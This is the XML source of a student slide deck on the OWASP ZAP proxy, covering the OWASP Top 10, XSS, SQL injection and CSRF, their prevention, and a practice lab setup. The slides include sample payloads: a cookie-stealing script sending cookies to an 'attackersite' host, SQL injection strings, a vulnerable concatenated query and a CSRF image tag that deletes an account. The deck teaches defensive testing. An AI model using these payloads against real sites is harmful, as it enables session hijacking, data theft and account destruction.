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280" r:id="rId24"/>
    <p:sldId id="281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86" r:id="rId34"/>
    <p:sldId id="288" r:id="rId35"/>
    <p:sldId id="287" r:id="rId36"/>
    <p:sldId id="283" r:id="rId37"/>
    <p:sldId id="284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7ED3-A757-4294-89EC-2040EAE599F6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7BE6-AD3D-444F-98C5-BEE3475DFD3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7ED3-A757-4294-89EC-2040EAE599F6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7BE6-AD3D-444F-98C5-BEE3475DFD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7ED3-A757-4294-89EC-2040EAE599F6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7BE6-AD3D-444F-98C5-BEE3475DFD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7ED3-A757-4294-89EC-2040EAE599F6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7BE6-AD3D-444F-98C5-BEE3475DFD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7ED3-A757-4294-89EC-2040EAE599F6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7BE6-AD3D-444F-98C5-BEE3475DFD3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7ED3-A757-4294-89EC-2040EAE599F6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7BE6-AD3D-444F-98C5-BEE3475DFD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7ED3-A757-4294-89EC-2040EAE599F6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7BE6-AD3D-444F-98C5-BEE3475DFD3E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7ED3-A757-4294-89EC-2040EAE599F6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7BE6-AD3D-444F-98C5-BEE3475DFD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7ED3-A757-4294-89EC-2040EAE599F6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7BE6-AD3D-444F-98C5-BEE3475DFD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7ED3-A757-4294-89EC-2040EAE599F6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7BE6-AD3D-444F-98C5-BEE3475DFD3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7ED3-A757-4294-89EC-2040EAE599F6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7BE6-AD3D-444F-98C5-BEE3475DFD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7B7ED3-A757-4294-89EC-2040EAE599F6}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>06-05-2013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8767BE6-AD3D-444F-98C5-BEE3475DFD3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ode.google.com/p/zaproxy/downloads/lis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zap-extension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Category:OWASP_Top_Ten_Project" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Main_P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p/zaproxy/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)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entest4devs.blogspot.in/2010/09/exploring-web-application-with-zap.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zaproxy.blogspot.co.uk/2012/09/owasp-zap-firefox-of-web-security-too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wasp.org/index.php/OWASP_WebGoat_Project" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://people.mozilla.org/~mcoates/WebSecurityLab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OWASP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Zed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Attack Proxy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Research and Development Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Final Report</a:t>
            </a:r>
          </a:p>
          <a:p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455672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/>
              <a:t>Submitted By:-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Pallav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Dhobley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>09005012</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Aditya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0"/>
              <a:t> Gupta 	09005017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ZAP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Intercepting proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Automated scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Passive scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Brute force scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Spider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Fuzzer</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Port scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Dynamic SSL Certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Beanshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/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11687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OWASP Top 10 Application Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Risks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1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>10 Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Risks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A1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>– Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>A2 – Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>A3 – Broken Authentication and Session Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>A4 – Insecure Direct Object References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>A5 – Cross-Site Request Forgery (CSRF) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>A6 – Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>A7 – Insecure Cryptographic Storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>A8 – Failure to Restrict URL Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>A9 – Insufficient Transport Layer Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>A10 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Invalidated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Redirects and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Forwards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2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XSS - Cross Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>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Problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>: User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>controlled data returned in HTTP response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>HTML/JavaScript code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>: Session Hijacking, Full Control of Page, Malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Redirects</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Basic XSS Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>:" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>&gt;&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Cookie Theft Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>: "&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>='http://attackersite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>/ '+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r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553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XSS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Stored XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Attacks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injected code is permanently stored on the target servers</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Reflected XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Injected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>code is reflected off the web server, such as in an error message, search result, or any other response </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>DOM Based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side 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6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Prevention of XSS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Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Encoding </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>converts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>characters to benign </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Input Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>becomes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>lt;script&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>;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73657"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="899592" y="4437112"/>
          <a:ext cx="7488831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277"/>
                <a:gridCol w="2472275"/>
                <a:gridCol w="2520279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&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
                        <a:t>lt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&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
                        <a:t>gt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“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&amp;quote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‘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&amp;#x27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HTML ENCODING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&amp;amp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419872" y="4725144"/>
            <a:ext cx="2016224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8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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>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Problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Incorrectly validated or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>non-validated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> string literals are concatenated into a dynamic SQL statement, and interpreted as code by the SQL engine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Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> Arbitrary SQL Execution, Data Corruption, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Data Theft</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Basic SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Tests:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>OR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>1=1 --' OR '1'= '1'-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> Vulnerable Query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>sqlQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> = “Select user from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>UserTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> where name= '+username+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t> ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>and pass = '+password+ ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean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5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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Injections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Order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The attacker can simply enter a malicious string and cause the modified code to be executed immediately.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Second Order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The attacker injects into persistent storage (such as a table row) which is deemed as a trusted source. An attack is subsequently executed by another activity.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Lateral Injection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The attacker can manipulate the implicit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>functionTo_Char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>() by changing the values of the environment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>variables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0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Prevention of SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>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Reduce the attack surface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Ensure that all excess database privileges are revoked</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Avoid dynamic SQL with concatenated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Use bind arguments.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Filter and sanitize input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The Oracle-supplied DBMS_ASSERT package contains a number of functions that can be used to sanitize user input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2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Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Site Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Forgery (CSRF)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Problem: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>cannot distinguish between user initiated actions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>automated actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Websites </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>process valid requests that are authorized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>to user and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>contain user session id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Impact: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dirty="0" smtClean="0"/>
              <a:t>Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>can perform arbitrary actions with victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>account on third party site. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>traceable, logs show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>performed these actions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Basic CSRF Test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=”http://targetsite/?action=deleteAccount”&gt;&lt;/img&gt;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5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Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Testing is VERY ILLEGAL ON UNAUTHORIZED SYSTEMS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19060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Prevention Measures That Do NOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Work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/>
              <a:t>a Secret </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Only Accepting POST Requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Multi-Step Transactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>URL Rewriting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7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Prevention of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>CSRF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Preventing CSRF requires the inclusion of an unpredictable token in the body or URL of each HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Such tokens should at a minimum be unique per user session, but can also be unique per request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The preferred option is to include the unique token in a hidden field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The unique token can also be included in the URL itself, or a URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>parameter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1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Setting up the Environment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1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Installation and Configuration of ZAP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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>code.google.com/p/zaproxy/downloads/list</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Zap runs on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>proxy. To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>set up the proxy in ZAP </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>go </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>to TOOLS &gt; OPTIONS &gt; LOCAL PROXY in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>ZAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Same configuration in the browser too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4005064"/>
            <a:ext cx="669674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Setting Up Web Security Learning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>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Required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" smtClean="0"/>
              <a:t>Software</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Virtual Machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Software</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>OWASP Broken Web Apps VM </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Proxy - Recommend OWASP Zap Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Web Proxy - Alternative Burp Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Browser - Recommend Firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Optional - Browser Plugins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Firebug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
              <a:t>Firecookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Installation instructions are written in the final report</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
